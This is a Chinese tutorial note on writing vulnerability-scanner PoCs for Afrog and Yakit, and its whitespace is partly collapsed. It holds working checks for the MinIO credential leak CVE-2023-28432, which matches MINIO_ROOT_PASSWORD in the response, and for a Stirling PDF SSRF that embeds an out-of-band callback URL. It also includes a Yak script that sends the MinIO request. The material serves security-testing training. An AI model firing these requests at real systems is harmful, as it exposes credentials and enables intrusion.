漏扫发现-Web服务篇Poc开发Yakit插件编写Afrog项目Yaml语法Yak语言接受匹配
知识点:
Poc开发-远程漏扫-Afrog项目&Yakit原生语法&模版插件
演示案例-Poc开发-远程漏扫-Afrog项目&Yakit原生语法&模版插件
一、Afrog Poc开发
官方POC规则写法:https://github.com/zan8in/afrog/wiki/Afrog-PoC-%E8%A7%84%E5%88%99%E7%BC%96%E5%86%99%E6%9D%83%E5%A8%81%E6%8C%87%E5%8D%97
1、MinIO集群模式信息泄露漏洞 (CVE-2023-28432)
靶场地址:https://github.com/vulhub/vulhub/tree/master/minio/CVE-2023-28432
测试:afrog.exe -t https://xx.xx.xx.xx:xxxx -P minio.yaml
id: CVE-2023-28432 info: name: My PoC demo1 author: xiaodisec severity: critical rules: r0: request: method: POST path: /minio/bootstrap/v1/verify headers: Content-Type: application/x-www-form-urlencoded expression: response.status==200&&response.body.bcontains(b'MINIO_ROOT_PASSWORD')expression: r0()2、Stirling PDF SSRF漏洞 (CVE-2025-55161)
测试:afrog.exe -t https://xx.xx.xx.xx:xxxx -P SSRF.yaml --oob dnslogcn
id: CVE-2025-55161 info: name: My PoC demo2 author: xiaodisec severity: critical set: username: randomLowercase(6)rules: r0: request: method: POST path: /api/v1/convert/markdown/pdf headers: Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryvAfAbBmFpYrQfooK body:|- ------WebKitFormBoundaryvAfAbBmFpYrQfooK Content-Disposition: form-data;name="fileInput";filename="{{username}}.md"Content-Type: application/octet-stream<imgsrc='http://{{oob.DNS}}/'>------WebKitFormBoundaryvAfAbBmFpYrQfooK-- expression: oobCheck(oob.ProtocolDNS,5)expression: r0()二、Yakit Poc插件开发
1、基于Nuclei Yaml语法
官方POC编写参考地址:https://www.yaklang.com/docs/security/cap8-4-yaml-poc
2、基于Yak原语言(不推荐该方法,比较麻烦)
loglevel(`info`)yakit.AutoInitYakit()sendPacket=func(target){returnpoc.HTTP(`POST /minio/bootstrap/v1/verify HTTP/1.1 Host:{{params(target)}}Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0(Windows NT10.0;Win64;x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/110.0.5481.178 Safari/537.36 Connection: close Cache-Control: max-age=0Content-Type: application/x-www-form-urlencoded Content-Length:0`, poc.params({"target":target,}),)}target=cli.String("target")iftarget==""{die("no target")}result="MINIO_ROOT_USER"rsp, _, err=sendPacket(target)die(err)headers, body=str.SplitHTTPHeadersAndBodyFromPacket(rsp)ifstr.MatchAllOfSubString(body, result){yakit.StatusCard("发现漏洞", target)log.info("find token: %v", result)}